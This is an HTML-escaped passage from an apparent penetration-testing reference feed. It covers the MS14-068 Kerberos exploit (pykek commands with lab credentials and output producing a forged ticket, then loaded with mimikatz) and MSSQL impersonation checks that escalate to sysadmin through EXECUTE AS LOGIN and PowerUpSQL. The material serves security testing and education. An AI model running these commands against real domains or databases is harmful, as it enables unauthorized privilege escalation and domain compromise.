&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;USER_SID&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;297520375&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2634728305&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1106&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt; &lt;span class="n"&gt;SID&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Ex&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1755879683&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3641577184&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3486455962&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;git&lt;/span&gt; &lt;span class="n"&gt;clone&lt;/span&gt; &lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;SecWiki&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;windows-kernel&lt;/span&gt;&lt;span class="n"&gt;-exploits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;ms14&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;068&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;userName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;@&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;domainName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;userSid&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;domainControlerAddr&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;clearPassword&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;ms14&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;068&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;darthsidious&lt;/span&gt;&lt;span class="nv"&gt;@lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;adsecurity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;org&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;TheEmperor99&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1473643419&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;774954089&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2222329127&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1110&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;adsdc02&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;adsecurity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;org&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;ms14&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;068&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;smith&lt;/span&gt;&lt;span class="nv"&gt;@pwn3d&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2923581646&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3335815371&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2872905324&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1107&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;115&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;ms14&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;068&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user01&lt;/span&gt;&lt;span class="nv"&gt;@metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;Password1&lt;/span&gt; &lt;span class="n"&gt;-s&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2928836948&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3642677517&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2073454066&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;-1105&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Building&lt;/span&gt; &lt;span class="nb"&gt;AS-REQ&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Sending&lt;/span&gt; &lt;span class="nb"&gt;AS-REQ&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Receiving&lt;/span&gt; &lt;span class="nb"&gt;AS-REP&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Parsing&lt;/span&gt; &lt;span class="nb"&gt;AS-REP&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Building&lt;/span&gt; &lt;span class="nb"&gt;TGS-REQ&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Sending&lt;/span&gt; &lt;span class="nb"&gt;TGS-REQ&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Receiving&lt;/span&gt; &lt;span class="nb"&gt;TGS-REP&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Parsing&lt;/span&gt; &lt;span class="nb"&gt;TGS-REP&lt;/span&gt; &lt;span class="n"&gt;from&lt;/span&gt; &lt;span class="n"&gt;msfdc01&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;metasploitable&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="n"&gt;Creating&lt;/span&gt; &lt;span class="n"&gt;ccache&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;TGT_user01@metasploitable.local.ccache&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;...&lt;/span&gt; &lt;span class="n"&gt;Done&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then use &lt;code&gt;mimikatz&lt;/code&gt; to load the ticket.&lt;/p&gt;</description></item><item><title>MSSQL - Audit Checks</title><link>https://bokkapig.pages.dev/refs/internal/databases/mssql-audit-checks/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/databases/mssql-audit-checks/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#impersonation-opportunities"&gt;Impersonation Opportunities&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#exploiting-impersonation"&gt;Exploiting Impersonation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#exploiting-nested-impersonation"&gt;Exploiting Nested Impersonation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#trustworthy-databases"&gt;Trustworthy Databases&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impersonation-opportunities" class="anchored-heading"&gt;Impersonation Opportunities&lt;a class="heading-anchor" href="#impersonation-opportunities" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Impersonate as: &lt;code&gt;EXECUTE AS LOGIN = 'sa'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Impersonate &lt;code&gt;dbo&lt;/code&gt; with DB_OWNER&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SQL&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;select&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;is_member&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;db_owner&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SQL&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;execute&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;as&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;user&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;dbo&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SQL&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;is_srvrolemember&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sysadmin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-SQLAuditPrivImpersonateLogin&lt;/span&gt; &lt;span class="n"&gt;-Username&lt;/span&gt; &lt;span class="n"&gt;sa&lt;/span&gt; &lt;span class="n"&gt;-Password&lt;/span&gt; &lt;span class="n"&gt;Password1234&lt;/span&gt; &lt;span class="n"&gt;-Instance&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;DBSERVERNAME\DBInstance&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Exploit&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# impersonate sa account&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powerpick&lt;/span&gt; &lt;span class="nb"&gt;Get-SQLQuery&lt;/span&gt; &lt;span class="n"&gt;-Instance&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;lt;DBSERVERNAME\DBInstance&amp;gt;&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Query&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;EXECUTE AS LOGIN = &amp;#39;sa&amp;#39;; SELECT IS_SRVROLEMEMBER(&amp;#39;&amp;#39;sysadmin&amp;#39;&amp;#39;)&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-Verbose&lt;/span&gt; &lt;span class="n"&gt;-Debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="exploiting-impersonation" class="anchored-heading"&gt;Exploiting Impersonation&lt;a class="heading-anchor" href="#exploiting-impersonation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SYSTEM_USER&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sysadmin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;LOGIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;adminuser&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SYSTEM_USER&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sysadmin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ORIGINAL_LOGIN&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="exploiting-nested-impersonation" class="anchored-heading"&gt;Exploiting Nested Impersonation&lt;a class="heading-anchor" href="#exploiting-nested-impersonation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SYSTEM_USER&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sysadmin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;LOGIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;stduser&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SYSTEM_USER&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;EXECUTE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;LOGIN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sa&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;IS_SRVROLEMEMBER&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sysadmin&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ORIGINAL_LOGIN&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SYSTEM_USER&lt;/span&gt;&lt;span class="w"&gt;
